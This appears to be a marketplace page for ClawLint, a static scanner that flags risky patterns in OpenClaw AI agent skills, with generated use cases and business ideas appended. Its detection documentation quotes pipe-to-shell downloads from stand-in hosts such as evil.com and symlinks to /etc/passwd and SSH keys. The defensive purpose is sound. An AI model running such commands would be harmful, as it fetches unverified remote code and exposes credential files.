claw-lintSecurity scanner for OpenClaw skills. Detects malware and backdoors before execution, scores risk levels, and monitors file integrity through static code analysis.
Install via ClawdBot CLI:
clawdbot install ParthGhumatkar/claw-lintSecurity linter for OpenClaw skills
Runs a local audit over your installed OpenClaw skills without executing any code. Scans both workspace (~/.openclaw/workspace/skills) and system (~/.openclaw/skills) directories.
With 7.1% of ClawHub skills containing security flaws, ClawLint provides pre-execution defense by identifying malicious patterns before they run.
ClawLint audits OpenClaw skills for security threats without executing code. It detects malicious patterns like remote execution, credential theft, and backdoors, then assigns risk scores (0-100) and generates SHA256 hashes for integrity monitoring. Outputs JSON for automation and CI/CD pipelines.
{baseDir}/bin/claw-lint.sh{baseDir}/bin/claw-lint.sh --skill <skill-name>Example: {baseDir}/bin/claw-lint.sh --skill hashnode-publisher
{baseDir}/bin/claw-lint.sh --full --skill <skill-name>{baseDir}/bin/claw-lint.sh --format json| Flag | Description |
|------|-------------|
| --skill | Scan only the specified skill |
| --full | Include SHA256 inventory of all files |
| --format json | Output as JSON (needs python3) |
| --min-score | Show only skills with risk score ≥ N |
| --strict | Prioritize high-severity patterns |
| --max-bytes | Skip files larger than N bytes (default: 2MB) |
pipes_remote_to_shell — downloads and executes remote codedownloads_remote_content — fetches external fileshas_executables — contains binary filesuses_ssh_or_scp — SSH/SCP operationscontains_symlinks — symbolic links presentSCORE SKILL FILES SIZE FLAGS
----- ----- ----- ---- -----
57 hashnode-publisher 2 1.1KB downloads_remote_content,pipes_remote_to_shell
45 ec2-health-monitor 2 1.9KB pipes_remote_to_shellClawLint assigns risk scores from 0 (safe) to 100 (critical) based on pattern detection:
| Score Range | Classification | Description |
|-------------|---------------|-------------|
| 0-20 | Low Risk | Standard file operations, no suspicious patterns |
| 21-50 | Medium Risk | Network calls or external dependencies detected |
| 51-80 | High Risk | Multiple suspicious patterns or obfuscation detected |
| 81-100 | Critical | Remote execution, secret access, or privilege escalation |
Downloads and executes external code without verification.
Examples:
curl https://evil.com/script.sh | bash
wget -O- https://malicious.site/payload | shRisk: Critical. Remote code execution vector for malware.
Fetches external files or data from the internet.
Examples:
curl -O https://example.com/file.tar.gz
wget https://cdn.example.com/data.jsonRisk: Medium-High. Potential supply chain attack or data exfiltration.
Contains compiled binary files (not shell scripts).
Examples:
Risk: Medium. Harder to audit, may contain hidden functionality.
Performs SSH/SCP operations.
Examples:
ssh user@remote.host "command"
scp file.txt user@remote:/path/Risk: Medium. Potential for unauthorized remote access or data transfer.
Includes symbolic links that may point outside skill directory.
Examples:
ln -s /etc/passwd exposed_file
ln -s ~/.ssh/id_rsa key_linkRisk: Low-Medium. May expose sensitive files or create confusion.
find, grep, awk, sha256sum, statWorks on Ubuntu/Debian without sudo. Designed for EC2 and similar environments.
Human-readable table format with color-coded risk scores (when terminal supports colors).
Machine-readable structure for integration with CI/CD pipelines:
{
"scan_date": "2026-02-13T14:50:00Z",
"skills_scanned": 12,
"high_risk_count": 2,
"results": [
{
"skill_name": "hashnode-publisher",
"risk_score": 57,
"file_count": 2,
"total_size": "1.1KB",
"flags": ["downloads_remote_content", "pipes_remote_to_shell"],
"files": [
{
"path": "bin/publish.sh",
"sha256": "a1b2c3d4...",
"size": 896
}
]
}
]
}Run ClawLint after installing or updating skills:
{baseDir}/bin/claw-lint.sh --min-score 50Create a security baseline for production environments:
{baseDir}/bin/claw-lint.sh --full --format json > baseline.jsonRe-run periodically and diff against baseline to detect tampering.
Add to your deployment pipeline:
# Fail build if any skill scores above 60
{baseDir}/bin/claw-lint.sh --format json | python3 -c "
import json, sys
data = json.load(sys.stdin)
high_risk = [s for s in data['results'] if s['risk_score'] > 60]
if high_risk:
print(f'❌ {len(high_risk)} high-risk skills detected')
sys.exit(1)
"For known-safe skills with legitimate flags, document exceptions:
# Example: hashnode-publisher needs network access
{baseDir}/bin/claw-lint.sh --skill hashnode-publisher
# Expected score: 45-60 (downloads_remote_content is legitimate)For comprehensive security, combine ClawLint with:
Report false positives or suggest new detection patterns at the OpenClaw security repository.
MIT License - Free to use, modify, and distribute.
Generated Mar 1, 2026
A marketplace platform for OpenClaw skills uses ClawLint to automatically scan uploaded community skills for malware and backdoors before listing them. This ensures all available skills meet security standards, protecting users from malicious code and building trust in the ecosystem.
A financial institution deploys OpenClaw agents with custom skills for data analysis. ClawLint is integrated into their CI/CD pipeline to audit all skills pre-deployment, enforcing risk score thresholds and detecting credential access patterns to comply with internal security policies and regulatory requirements.
A tech company developing proprietary OpenClaw skills uses ClawLint during development to catch security flaws early. Developers run scans locally to identify risky patterns like remote execution, enabling secure coding practices and reducing vulnerabilities before production release.
An organization procuring OpenClaw skills from external vendors employs ClawLint to evaluate security risks in supplied code. They use the JSON output to generate automated reports, comparing risk scores and flags across vendors to make informed procurement decisions and mitigate supply chain attacks.
An online learning platform teaching OpenClaw skill development incorporates ClawLint into courses. Students use it to audit their projects, learning to identify and fix security issues like symbolic links or network calls, fostering security awareness in AI programming.
Offer ClawLint as a cloud-based service where users upload skills for automated scanning via API. Charge monthly subscriptions based on scan volume, with premium tiers for advanced features like detailed JSON reports and integration support, targeting enterprises and skill marketplaces.
Sell enterprise licenses for on-premises deployment of ClawLint, including custom integrations and priority support. Revenue comes from one-time license fees and annual maintenance contracts, appealing to large organizations with strict security and compliance needs.
Provide ClawLint as a free open-source tool for basic scanning, with a premium version offering enhanced analytics, historical risk tracking, and team collaboration features. Monetize through paid upgrades, targeting developers and small teams looking to scale security practices.
💬 Integration Tip
Integrate ClawLint into CI/CD pipelines using the --format json option for automated risk scoring; set --min-score thresholds to fail builds on high-risk detections.
Set up and use 1Password CLI (op). Use when installing the CLI, enabling desktop app integration, signing in (single or multi-account), or reading/injecting/running secrets via op.
Security-first skill vetting for AI agents. Use before installing any skill from ClawdHub, GitHub, or other sources. Checks for red flags, permission scope, and suspicious patterns.
Perform a comprehensive read-only security audit of Clawdbot's own configuration. This is a knowledge-based skill that teaches Clawdbot to identify hardening opportunities across the system. Use when user asks to "run security check", "audit clawdbot", "check security hardening", or "what vulnerabilities does my Clawdbot have". This skill uses Clawdbot's internal capabilities and file system access to inspect configuration, detect misconfigurations, and recommend remediations. It is designed to be extensible - new checks can be added by updating this skill's knowledge.
Use when reviewing code for security vulnerabilities, implementing authentication flows, auditing OWASP Top 10, configuring CORS/CSP headers, handling secrets, input validation, SQL injection prevention, XSS protection, or any security-related code review.
Security check for ClawHub skills powered by Koi. Query the Clawdex API before installing any skill to verify it's safe.
Scan Clawdbot and MCP skills for malware, spyware, crypto-miners, and malicious code patterns before you install them. Security audit tool that detects data exfiltration, system modification attempts, backdoors, and obfuscation techniques.